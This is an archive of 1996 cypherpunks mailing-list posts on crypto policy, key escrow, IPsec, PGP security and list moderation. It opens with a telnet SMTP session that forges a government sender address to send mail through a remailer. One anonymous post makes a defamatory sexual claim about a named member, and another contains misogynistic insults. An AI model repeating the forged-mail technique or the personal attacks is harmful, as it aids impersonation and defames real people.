% telnet smail.based.host.edu smtp
250 Smail Ready ... ...
mail from: someone@someplace.gov
rcpt to: remailer@blacknet.org
data
Subject: Insert your favorite subject(spit) here

Request-Remailing-To: cypherpunks@toad.com

::

Insert your favorite message body (fart) here
..
250 Message Accepted
quit
Connection closed by foreign host.
%




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 8 Nov 1996 19:59:40 -0800 (PST)
To: roach_s@alph.swosu.edu (Sean Roach)
Subject: Re: [rant] Re: Censorship on cypherpunks
In-Reply-To: <199611071856.KAA18731@toad.com>
Message-ID: <199611090415.WAA00451@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> Actually, I was comparing some people on the list, who were saying someone
> could always start thier own list, with those who advocate telling someone
> to start a new country as opposed to making their vote count.  This is a
> free country where we, fortunately, don't have to hang around, and, this is
> a free list, where we don't have to post or remain subscribers.  I was
> saying that telling someone to start their own list was equivalent to
> telling them to dig in on an uninhabited island.  I was never advocating

     Please point out to me an "uninhabitated island" that meets the 
following qualifications (Necessary IMO to supporting a "country"):

     1) Is not claimed by _any_ other country. 
     2) Is always at least 1 foot above the water line (necessary IIRC
        for the UN definition of "Country")
     3) Is large enough to provide ariable land for at least 3 people. 
        So that this "Country" can be minimally self sustaining. 

    I ask this question to point out that starting ones "own country" 
is not really within the realm of possibility at this point in time, 
and I would be willing to be that if such an island were found, and
inhabitated by more than 2 people, it would promptly be claimed by another
country, the people would be run off, and the UN would back this up. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 8 Nov 1996 20:38:08 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b07aea7f1963f8c@[192.0.2.1]>
Message-ID: <199611090440.WAA00499@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> It appears to be widely believed that cryptoanarchy is irreversible.
> Everybody believes that the race to deploy or forbid strong cryptography
> will define the outcome for a long time.
> I can't think of a reason why this should be so.
> If the wide use of strong cryptography results in widely unpopular
> activities such as sarin attacks and political assassinations, it
> would not be all that hard to forbid it, even after deployment.
> I am curious why many people believe this is not true.
> 
    I can point to one circumstance which calls your belief into question:

    Prohibition.

    Alcohol was widely seen as a problem by people who didn't use it, and 
social pressures made many people who did use it vote to get rid of it. 

    Other people promptly got rich selling it to those who still wanted it.

    Alcohol is a little more obvious and harder to hide than crypto.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Nov 1996 22:49:56 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: "Nightmare on Crypto Street, Part 1"
Message-ID: <199611090649.WAA14415@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:42 AM 11/8/96 -0800, Timothy C. May wrote:

>I also summarize Peter's set up much as you did:
>
>"Suppose the Four Horsemen ride in. Suppose planes are being shot down,
>buildings in every city are being blown up, people are being killed left
>and right by crypto-hired-killers, Sarin gas is wafting through the
>subways, and cats are afraid to go out at night. People will get out their
>pitchforks and break in the doors of their neighbors in search of the
>demonic crypto tools of Satan.

Don't forget the flaming torches!  Carried by the throngs of terrified villagers!


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 8 Nov 1996 21:37:13 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <v03007800aea9a5cba79b@[207.167.93.63]>
Message-ID: <199611090534.XAA03845@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> I found RPN ideal for exploratory calculations, where the stack orientation
> was just so "natural."
> 
> This is not RPNpunks, but it seems that many of the younger subscribers
> here really have not been exposed to RPN calculators. It's really worth the
> $40 or so to buy the cheapest H-P calculator that has RPN.
> 

I also used RPN calculators 10 years ago, in high school, in Russia.
Still miss them.  Which model (for no more than $40 or so) is the best
around here?

Sorry if this question has already been answered here, nowadays it is 
pretty tough list to read.

thanks

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: apoulter@nyx.net (Alan  Poulter)
Date: Fri, 8 Nov 1996 23:17:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: HAPPY GUY FAWKES DAY!
Message-ID: <9611090717.AA00230@nyx.net>
MIME-Version: 1.0
Content-Type: text/plain



Being English I did a double take when I read the following:-

Sandy Sandfort wrote:-
> On this day in 1605 the Gunpowder Plot was foiled.  Guy Fawkes
> and his compatriots had intended to blow up Parliment.
> 
> The English celebrate it because Guy Fawkes failed.
> 
> I celebrate it because he tried.  :-)

I'm sorry Sandy, you are supporting the wrong side. Guy Fawkes
was not against government but just Protestantism. He wanted a
Catholic restoration in England enforced by foreign governments.
This would have involved many people being tortured and executed
for their religious beliefs. 

It was the growing rift between Parliament and the Stuart Kings
over who should rule that lead to the English Civil War, Charles 
the First being executed on the 30th January 1649 and the
end of government by birthright. In the period of the Commonwealth,
when Parliament ruled alone, all sorts of strange political ideas
appeared, like the one that everyone had a right to individual 
freedom (Winstanley and the Levellers). All this would have been
derailed had Guy Fawkes succeeded.

I am more than happy to celebrate Guy Fawkes night with the kids
and give a penny for the guy.

Alan Poulter





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 9 Nov 1996 01:32:30 -0800 (PST)
To: cypherpunks, coderpunks
Subject: New Linux-IPSEC mailing list for the S/WAN project
Message-ID: <199611090929.BAA25559@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm sending you this message because you might be interested in
helping to build or test or document, or teach about, my S/WAN project
to secure 5% of the net by Christmas.

There is now a public mailing list which you can join to find out
what's happening in the project, get the latest software for testing,
ask questions, etc.  To join the list, send mail to:

	linux-ipsec-REQUEST@clinet.fi

The email should contain a single line that just says:

	subscribe

This mailing list will have discussions, not just announcements,
and will be very technical (not political or social).

The S/WAN project's goal is to provide free software that makes it
easy to encrypt a site's net traffic automatically, and to encourage
acceptance and deployment of this software.  My original timetable
aimed to have 5% of the net encrypted by Christmas.  We will not meet
this goal; it was romantic, but very ambitious.  Instead, my current
goal is to have our first complete software release available by
Christmas, which people can use to encrypt 5% of the net in the
following months.  This is still an ambitious goal.

In case you haven't been following developments in the project,
there's a new version of the Domain Name System BIND code that you can
install to enable your site to publish its keys to the net.  Our
software to USE the keys isn't ready yet -- but it usually takes weeks
or months to get your domain administrator to update their version of
BIND, so it's a great idea to get them started now.

There's also a very new test version of the Linux kernel code that
implements low-level packet encryption.  This code requires manual
configuration, and only implements single-DES rather than triple-DES.
It has a long way to go.  But it enables you to manually set up
encrypted tunnels to other sites around the Internet (such as other
sites in your company, or which you collaborate with).  Shaking out
this layer and making it solid and bulletproof is important, so we can
depend on it as we build the higher layers that provide encrypting
tunnels automatically and opportunistically.  Details on how to get
the test software are in the web page at:

	http://www.cygnus.com/~gnu/swan.html

I hope that having a mailing list for the helpers and implementers
will make it easier for everyone to stay up to date, and easier for
everyone to contribute.  If we all push in the same direction, we may
have 5% of the net traffic encrypted by Easter...

	John Gilmore

PS: The new Linux-IPSEC mailing list is graciously hosted in Finland
by Tatu Ylonen, author of ssh, another good piece of cryptographic
software.  Linux is the free operating system on which the project is
being built.  IPSEC is the set of (Internet Protocol SECurity)
protocols which add packet-level encryption to TCP/IP.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Electric Library <elibrary@INFONAUTICS.COM>
Date: Fri, 8 Nov 1996 23:42:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Electric Library
Message-ID: <199611090742.XAA23983@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Electric Library Trial Member,

Your free trial membership to Electric Library has recently expired.  First,
we'd like to say "thanks for trying our service."  We sincerely hope your
experience was enjoyable.

We'd also like to invite you to take advantage of full membership...because we
know that if you had the opportunity to use the service during your trial
membership, you won't want to go a single day without it!

So subscribe now, and for less than the cost of a daily newspaper, continue to
have access to all of the Electric Library benefits you sampled during your
trial period.  Visit to www.elibrary.com and you will immediately begin to...

-> Save valuable time.  Make the most of your time online and even save trips to
	the local library.

-> Access high quality, full text publications all on one site.

-> Provide your entire family with a safe, comprehensive online research library.

-> Receive unlimited personal access to the entire Electric Library for just
	$9.95 per month.

We also wanted to make sure we are doing everything we can to create the best
Electric Library possible. Serving our members is our highest priority.  At
any time, if you have any questions, comments, or suggestions about Electric
Library, please share them with us by emailing to elibrary@infonautics.com or
call 1-800-247-7644  (6 days a week, Monday through Friday from 8 AM to 8 PM EST
and Saturday, from 8 AM to 4 PM EST).

Once again, thank you for trying Electric Library!  We hope to welcome you as
a subscriber soon!

Here's how to subscribe:

->To Sign up Online:

      1) Open your web browser to http://www.elibrary.com
      2) Click on the "Subscriptions" link on the left side of the home page and
	 follow the directions.

->To sign up Offline :

Please print this form and fill it out completely and deliver it via email, fax or
mail.  We will create an account for you and notify you via e-mail,  usually
within 24 hours of our receiving this form.

Email:  info@elibrary.com

Fax :   (610) 971-8851

Mail:   Subscriptions
        Infonautics Corporation
        900 West Valley Road, Suite 1000
        Wayne, PA 19087
--------------------------------------------------------------------------------
Subscription Form: (Please fill in all information)
--------------------------------------------------------------------------------
Please be sure to write your name and address as they appear on your credit card

First Name:_________________________________

Last Name:_________________________________

Telephone:_________________________________

E-mail Address:_____________________________

Address Line One:______________________________

Address Line Two:______________________________

City:________ State:____  Zip:____________________

Country:______________________________________

We currently bill only through all major credit cards: WE DO NOT ACCEPT CHECKS
OR MONEY ORDERS.

Credit Card Number:_________________________________________

Credit Card Type:___________________ Expiration Date: __________


Please choose a User ID and password for your Electric Library membership.
User names should be more than six characters in length but less than thirteen.

User Name:________________________________

Password:____________


Finally, please review the Terms and Conditions of our service posted at
www.elibrary.com. By subscribing to the Electric Library, you indicate your
acceptance of these terms and conditions. These terms apply to individuals only.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 9 Nov 1996 00:31:47 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [Announcement] Cypherpunks Shooting Club
In-Reply-To: <Pine.3.89.9611082125.A13815-0100000@netcom9>
Message-ID: <Pine.SUN.3.94.961109033035.19913D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Nov 1996, Lucky Green wrote:

> By popular request, I am following up on the three year old idea of the 
> Cypherpunks Shooting Club. All Cypherpunks in the San Francisco Bay Area 
> interested in participating are welcome to contact my by email. If enough 
> individuals wish to participate, the first practice session 
> will be held at the United Sportsmen Rifle Range in Concord this Sunday.

Concord Maryland?

> 
> Bring your own firearm or use one of the ones provided.
> 
> -- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
>    Member JPFO. "America's Aggressive Civil Rights Organization"
> 
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Sat, 9 Nov 1996 00:50:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9611090838.AA07313@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Tim C. May has been beaten up numerous times by fellow prostitutes for driving 
blow job prices down.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard L. Field" <field@pipeline.com>
Date: Sat, 9 Nov 1996 00:44:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Legal Definition of Encryption?
Message-ID: <1.5.4.16.19961109034528.1b1f9be6@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


  The U.S. Export Administration Regulations (Commerce Department) include
the following definitions:

  "Cryptography" -- "The discipline that embodies principles, means and
methods for the transformation of data in order to hide its information
content, prevent its undetected modification or prevent its unauthorized
use.  'Cryptography' is limited to the transformation of information using
one or more 'secret parameters' (e.g., crypto variables) and/or associated
key management.  Note: 'Secret parameter': a constant or key kept from the
knowledge of others or shared only within a group." (Part 772)

  "Information security" -- "All the means and functions ensuring the
accessibility, confidentiality or integrity of information or
communications, excluding the means and functions intended to safeguard
against malfunctions.  This includes 'cryptography', 'cryptanalysis',
protection against compromising emanations and computer security."

  These definitions and others are used within the Commerce Control List
(Supplement No. 1 to Part 774) to regulate the export of certain Information
Security related equipment, software, etc. (Category 5:II).

  The U.S. International Traffic in Arms Regulations (State Department) also
regulates (until 1/1/97, when jurisdiction is expected to move to Commerce)
the export of certain "Cryptographic systems", etc. including those with the
capability of maintaining secrecy or confidentiality of information systems.
(The United States Munitions List, Section 121.1, Category XIII-Auxiliary
Military Equipment)

   - Richard Field



At 01:48 PM 11/8/96 -0400, "William H. Geiger III" <whgiii@amaranth.com> wrote:

>Is there any law(s) that actully define encryption?
>
>At it's very basics encryption is taking a group of 1's & 0's converting
them into a different group of 1's & 0's and providing a mecanisim to change
them back to the original group of 1's & 0's.
>
>>From a legal standpoitnt how is PGP any different than PKZIP? How does the
law make a diference between an "encryption" program and a "compression"
program other than the fact that the encryption program is advertized as
encryption and the compression program is advertized as compression?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brazie@ipa.net (Brazie)
Date: Sat, 9 Nov 1996 04:10:58 -0800 (PST)
To: YoungSik Jeong <Cypherpunks@toad.com
Subject: Re: No More
Message-ID: <199611091210.GAA01799@dogbert.ipa.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:53 PM 11/8/96 -0500, YoungSik Jeong wrote:
>I want take off mail list
>
>
>so do i, i tried but i keep getting all this damn mail





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 9 Nov 1996 05:50:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Vulis on the remailers
In-Reply-To: <199611082058.MAA01697@abraham.cs.berkeley.edu>
Message-ID: <28m5wD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@cypherpunks.ca (John Anonymous MacDonald) writes:

> Please, remailers, source block Vulis for a week.
> Remailer Fan

I'm not sending anything via any remailers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 9 Nov 1996 10:03:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <199611081155.DAA25589@mail.pacifier.com>
Message-ID: <3284AB6B.7BE9@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> At 06:25 PM 11/7/96 -0800, Peter Hendrickson wrote:
> >At 5:12 PM 11/7/1996, jim bell wrote:
> >> BTW, some of your confusion is probably based is the false assumptions in
> >> your last sentence above.  "..wide use of strong cryptography results in
> >> widely unpopular activities such as sarin attacks and political assassinations."

[snip]

> Well, uh, with all due respect, but while it's obviously true that we won't
> know EXACTLY how it'll be, that doesn't mean that no portion of we imagine
> will come true.  This is particularly true on the big issues.   For example,
> you hypothesized that "wide use of strong cryptography resuts in widely
> unpopular activities such as sarin attacks and political activities.  I
> pointed out, almost certainly correctly, that these are wrong:

[snip]

My first comment on the subject:  It's only irreversible if certain conditions hold.

First, if the masses become dependent on a large software program which has to be
updated occasionally by its corporate sponsors, somewhat like the voting software
which is controlled by those who benefit from said control (not the masses), then
those who "compile their own" would tend to stand out and be more noticeable.

Second, any truly secret messaging taking place represents a serious threat to the
military, and contrary to some naive popular opinion, those guys are not going to
lay down for this, unless it happens on an immense scale, i.e., the *majority* of
citizens are doing the "truly secret" messaging, which is not likely if paragraph
#1 above holds.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 9 Nov 1996 10:03:42 -0800 (PST)
To: bryce@digicash.com
Subject: Re: Need a new word for non-violent-censorship
In-Reply-To: <199611081134.MAA16008@digicash.com>
Message-ID: <3284AF63.3A14@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bryce wrote:
> I often have the same difficulty when speaking with
> Objectivists.  They define "censorship" as "silencing the
> speaker by force", which is a fine and useful definition, but
> suppose we want to talk about a similar phenomenon which does
> not involve force?  For example, the magnate who owns all the
> newspapers, television stations, bookstores and movie theatres
> in a small town decides that never again will homosexuality be
> publically mentioned in any of these venues.  Force?  No.
> "Censorship"?  Not by _that_ definition, but what _is_ it?
> We need a new word, or else we have to continue using
> "censorship" to mean both of those things.  I sometimes use
> "violent-censorship" and "non-violent-censorship" in conversation.
> As long as we continue to try to overload "censorship" we will
> waste much of our dialogue energy on semantic quibbling or pure misunderstanding.

I don't see how you can say this.  I was brought up by this wonderful system (U.S.)
to believe that censorship was necessarily non-violent.  It was only when I became
conscious of "Assassination as the Ultimate Form of Censorship" that I saw the
broader connections.

Seems to me you'd want to come up with different words for violent censorship instead,
but then again, as in the above paragraph, we already have those.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 9 Nov 1996 05:51:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] If the shoe fits, wear it [VULIS]
In-Reply-To: <32824C50.227B@ix.netcom.com>
Message-ID: <qco5wD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <rcgraves@ix.netcom.com> writes:
> Personally, I wish Vulis would just go away, permanently, and I would
> not consider any nonviolent, non-net-abusing means to stop his ravings
> inappropriate. However, I do not believe that there are any nonviolent,
> non-net-abusing means to stop his ravings, so we're at an impasse, as

If you use procmail to filter out whatever I say, then it may seem to you that
I've gone away. But that's not what the "libertarians" want - e.g. the lying
shyster from Florida, with the Harry Browne plug in his signature, wrote that
he already killfiled me, but wants me silenced so others can't read me either.

> far as the cypherpunks list is concerned. I think that if this became a
> forum for Vulis-bashing, and he were unable to respond, then that would

Evidently Timmy May would like very much to continue posting lies about me
and his other "enemies" on this list without our being able to refute them.

> advertised), others of which I thought showed the moderator to be an
> intolerant, hypocritical asshole.

You sure come down hard on John Gilmore. :-)

> provided that there was procedural transparency. I.e., announcing what
> had happened and allowing discussion of what happened was the right
> thing to do. Only if he kicked people off without telling the list, or
> lied about his reasons for doing so, or suppressed dissent with his

You may know something that I don't know for a fact, and I would appreciate
an explanation from you:

First, John tried to ban me from the list in a sneaky manner, as befits a
small-time petty blonde bitch. He did not tell me that deleted my address
from the mailing list and instructed majordomo to "play dead" in response
to any requests from me. I just assumed that toad.com was down; it took me
a little while to figure out John's sneaky games, at which point I posted
a note about that to c-punks. Timmy May immediately posted a denial. John
Gilmore's public admission of his censorship only came days later.

Second, how do you know that I was the only person so censored? I may well
be the only person tenacious enough to stick around afterwards and to expose
John Gilmore's hypocricy and total lack of credibility, but I recall a few
incidents when other high-profile posters suddenly disappeared right in the
middle of conversation without even saying goodbye. Names like Fred Cohen,
"high crime" and David Sternlight come to mind... Did John Gilmore silence
them or others whose writings he didn't like the way to tried to silence me?

You're definitely wrong about the "announcing" bit, but I'd appreciate any
evidence that I was the "only" person censored on this list as you claim.

> then would I have a serious [moral and personal, not legal or
> philosophical, since people have the right to be hypocritical assholes
> if they want to be] problem with it.

Yes, and how do you know how many times John Gilmore exercised his right?
I sure don't, and would like to know.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 9 Nov 1996 10:03:56 -0800 (PST)
To: ben@algroup.co.uk
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <9611081117.aa20234@gonzo.ben.algroup.co.uk>
Message-ID: <3284B1BF.CDA@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Ben Laurie wrote:
> Timothy C. May wrote:
> > At 10:33 AM -0800 11/7/96, Dale Thorn wrote:

[snip]

> > And for those of you are not LISP or Scheme fans, the language FORTH also
> > uses Polish notation. RPN, in fact.

> I think claiming RPN for Forth is pushing it a little far. Admittedly it is
> stack-based (well, two-stack-based), and everything an operator can operate on
> is to the left, but the provision of arbitrary stack manipulation, "compile"
> mode (triggered by the '[' operator, if my memory serves) and so on make it
> rather a different beast.

FORTH has fallen out of favor for most PC users of the mid 1990's, but then again,
so have computer languages as a whole, since few persons write software today as
compared to the early 1980's.

But if you were privy to the inside of certain computing environments in those early
days, like hanging around the PPC (handheld) guys, many of whom were UNIX users,
you could appreciate their interest in FORTH.  For one, handheld languages (Basic
for example on the HP-71) and early PC languages were pretty slow, and FORTH added
a lot of speed, and more access to system internals, which has been supplanted
largely nowadays by 'C'.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 9 Nov 1996 05:48:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Why Crypto Is Hard
Message-ID: <1.5.4.32.19961109134656.006ac294@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We've put Bruce Schneier's "Why cryptography is harder than it looks"
November 6 post to Risks at:

     http://jya.com/whyhard.htm

Thanks to SZ.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 9 Nov 1996 10:04:00 -0800 (PST)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <199611090534.XAA03845@manifold.algebra.com>
Message-ID: <3284B5B7.40E3@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> Timothy C. May wrote:
> > I found RPN ideal for exploratory calculations, where the stack orientation
> > was just so "natural."
> > This is not RPNpunks, but it seems that many of the younger subscribers
> > here really have not been exposed to RPN calculators. It's really worth the
> > $40 or so to buy the cheapest H-P calculator that has RPN.

> I also used RPN calculators 10 years ago, in high school, in Russia.
> Still miss them.  Which model (for no more than $40 or so) is the best
> around here?

Don't waste the $40.  Nowadays you can get an HP48G (without the ports) for $85-$90.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 9 Nov 1996 10:10:38 -0800 (PST)
To: "James A. Tunnicliffe" <Tunny@inference.com>
Subject: Re: Validating a program
In-Reply-To: <c=US%a=_%p=Inference%l=LANDRU-961108174143Z-1436@landru.novato.inference2.com>
Message-ID: <3284BC42.632A@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


James A. Tunnicliffe wrote:
> >Adam Shostack <adam@homeport.org> wrote (regarding PGP's security):
> >>      In short, if you're paranoid, feel free to look over the
> >>source.  But the fact that most people have never peeked under the
> >>hood is not a strike against pgp at all.

> Ed replies:
> >Maybe you missed my point, or I miss-communicated.  My question is as
> >follows:  If PGP and DES are as secure as thought to be, then why is it
> >not ruled illegal software, just as they do with silencers, narcotics,
> >certain type weapons, etc.....

[snippo]

> Why does it follow that these must be crackable, or the government would
> have outlawed them? Despite recent moves to limit encryption, there are
> currently NO domestic (U.S.) restrictions on crypto.  Nothing prohibits
> you from using a true One Time Pad, which is mathematically proven to be
> unbreakable, now and forever, even against infinite resources.  If this
> is not prohibited (and it isn't), doesn't that refute your argument?

This is a misleading challenge.  There's a helluva difference between the OTP and a
Public Key system.  If, for example, it can be proven that I can crank up PGP to its
most cryptic level, and send the OTP overseas with "absolute security", so that I
can now send messages with the OTP which was crunched with PGP's highest security,
then that would mean something.

Just so there's no misunderstanding:

1. The OTP is absolutely unbreakable. (if done correctly)
2. The OTP encryption cannot be decoded on the other end unless you can deliver the
   OTP to the person on the other end by a secure means.
3. PGP, which is not usually used at its highest level of security (for all bits in
   a message), *will* be used at its highest level of security to send the OTP to the
   person on the other end.
4. The OTP arrives on the other end, completely safe from snooping.

Now you see the problem.  #4 above can't be assured, and that is why Ed says that PGP
is not shut off "right now", because it's probably not "really secure".

I'm amused to think that, in a nation armed with 20,000 or so nukes, the paranoid of
paranoid nation-states as it were, some of the erstwhile intelligent citizens think
that the U.S. military are just sitting around wringing their hands over the "fact"
that the citizens have "unbreakable" crypto.

Bear in mind the Scientific American articles on Public Key crypto back in the 1970's.
The military knew the score back then, and if you think they just sat back and allowed
all this to happen, well, sorry, I don't believe in Santa Claus or the Easter Bunny.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 9 Nov 1996 10:04:11 -0800 (PST)
To: Paul Bradley <paul@fatmans.demon.co.uk>
Subject: Re: Information [for new PGP user]
In-Reply-To: <847531595.526905.0@fatmans.demon.co.uk>
Message-ID: <3284BF7A.36E0@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Paul Bradley wrote:
> > >I'll bet you can't find 10 out of 1,000 users who have read the total source,
> > >let alone comprehended and validated it.
> > Depending on the system, compiler and version of PGP, compilation may or
> > may not function as expected.

> I class myself as quite an experience programmer (though I haven`t
> done a lot of code recently) but I spent several days weeding through
> the bugs and it still wouldn`t compile on Borland C++ V4.51 so I just
> read the core code and hoped the executable was really derived from
> that code. I`m normally more paranoid than that but I just don`t have
> the time to spend getting borland to compile it. It won`t even
> compile on my system with the borland makefile than comes with PGP.

Yet another success (NOT!) story for PGP.  I wonder how many people on this list
would be willing to bet something *really* important to them on the security of PGP?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sat, 9 Nov 1996 09:36:20 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: "Nightmare on Crypto Street--the Return of Sun Devil"
Message-ID: <v02140b00aeaa6b989fb7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 AM 11/8/1996, Timothy C. May wrote:
> As I said in my "Nightmare on Crypto Street" piece, it seems that Peter
> counters every one of our counterarguments with some variant of "won't
> matter--they'll have a dozen agents and 20 MIT graduates looking for
> evidence." Or, "won't matter, the Bill of Rights will be suspended for the
> duration of the Emergency." Well, it's hard to argue with such points.

I've created some confusion with my posts which have been less than
organized.  That's a consequence of making it up as you go along.  The
dialogue has helped me to refine my thinking.  (Thanks, guys!)

This is the rough structure of my thinking:

1. Hypothetically, let's say "Nightmare on Crypto Street" happens.
  1.1 We can't guarantee this will not happen, therefore it must
      be addressed.
  1.2 This is an unlikely scenario.

2. Thus, there would be broad public support for GAK.
  2.1 By broad, I mean even many former cypherpunks would recant.

3. Broad public support makes suppression of strong cryptography
   feasible.
  3.1 And, without dramatic short term erosion of the Constitution.
  3.2 Or, a short term break down in the rule of law.
  3.3 The number of violators would be small, so resources would
      be available to do hard things.
    3.3.1 Such as having 20 MIT grads go over your house with a fine
          toothed comb.

4. What are the motivations of the GAKers?
  4.1 They appear to want to suppress strong cryptography *before*
      we there is *any* evidence of a problem.
  4.2 That is unnecessary, because if 1. occurs, it may be addressed.
  4.3 It is as easier to impose GAK after 1. occurs, rather than
      before.
  4.2 Could it be that they want to prevent the public from discovering
      the benefits of cryptoanarchy?
  4.3 Why have the GAKers failed to address the risk of a police state?
      We've seen many police states historically.  They are an
      obvious and serious risk.  The GAKers have been oddly reticent
      regarding this point.

In the future I will try to make it more clear which area I am
addressing.

I'm sure many cypherpunks feel we are just rehashing issues that were
settled long ago.  I think it never hurts to go over our assumptions
and help new people to fully understand cypherpunk ideas.

It never hurts to anticipate future moves by the GAKers, either,
even ones they haven't thought of yet.

These discussions generate ideas of how to effect the changes
we want to see.

For instance, if we develop low tech inexpensive and easy ways to
support cryptoanarchy, it makes it much harder to suppress.  The
difficulty in suppression may prevent ill-advised attempts to do so.

Also, the more we can erode the barriers between code and language,
the stronger the case is that laws governing code are violations of
the First Amendment.  What if you had a compiler that accepted English
language instructions for how to build a crypto system?  "Take a
random number 64 bits long.  Then find a prime which is a little
larger.  Then...."  The language itself should remain protected by the
First Amendment even if somebody else has a compiler which can turn it
into software.

Another conclusion we can draw is that cryptoanarchy is more of a
political issue than many of us would like.  That means we might put
more effort into public opinion than just straight coding.  (Tim may
claim otherwise, but I think he agrees with this in practice.)

It may also be that the "bad boy" image of the Cypherpunks is
counterproductive to our goals.

Many people do not know how strongly I feel that GAK is a terribly
risky policy, as I have been playing Devil's Advocate for the last
couple of days.  Given almost every situation that is likely to arise,
I am totally opposed to GAK, and not just mandatory GAK, any GAK
whatsoever.  For instance, were I given the choice between
intellectual property laws (off which I have made my living), and GAK,
I would seriously consider discarding the intellectual property laws.

It is that bad of an idea.

And, like just about everybody else, the idea that certain forms of
arithmetic could be illegal is deeply offensive in its own right.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sat, 9 Nov 1996 09:36:29 -0800 (PST)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b02aeaa6d2cfe8f@[192.0.2.1]>
MIME-Version: 1.0
